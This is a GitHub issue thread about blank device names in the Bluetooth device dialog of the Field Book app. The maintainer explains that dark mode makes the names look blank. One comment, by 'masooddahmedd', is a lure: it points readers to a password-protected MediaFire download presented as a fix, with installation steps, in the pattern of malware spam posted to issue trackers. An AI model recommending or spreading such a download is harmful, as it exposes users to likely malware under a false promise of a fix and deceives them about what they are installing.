### ISSUE TITLE
[BUG]: Skip blank device name options in bluetooth device dialog

### ISSUE THREAD

**Issue by bellerbrock** [PhenoApps/Field-Book#1034]
### Description

Originally reported by @ramierop.
![IMG_20240826_150601](https://github.com/user-attachments/assets/e9e1878b-9ab5-43b9-8fcb-717ea85f8b72)

### Expected behavior

Device chooser should filter out blank name devices

### Field Book version

5.6.22

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bellerbrock** [comment]
The linked PR now excludes actual blank device names. But the reported bug looks like its a different issue, when debugging with a pixel 6a I see that the device names exist but they all look blank due to a side effect of the device dark mode being on. So @ramierop you can fix the issue by going to settings, searching dark theme, and disabling it.

Longer term we should make Field Book play nice with the device dark theme, looks like that is part of #960
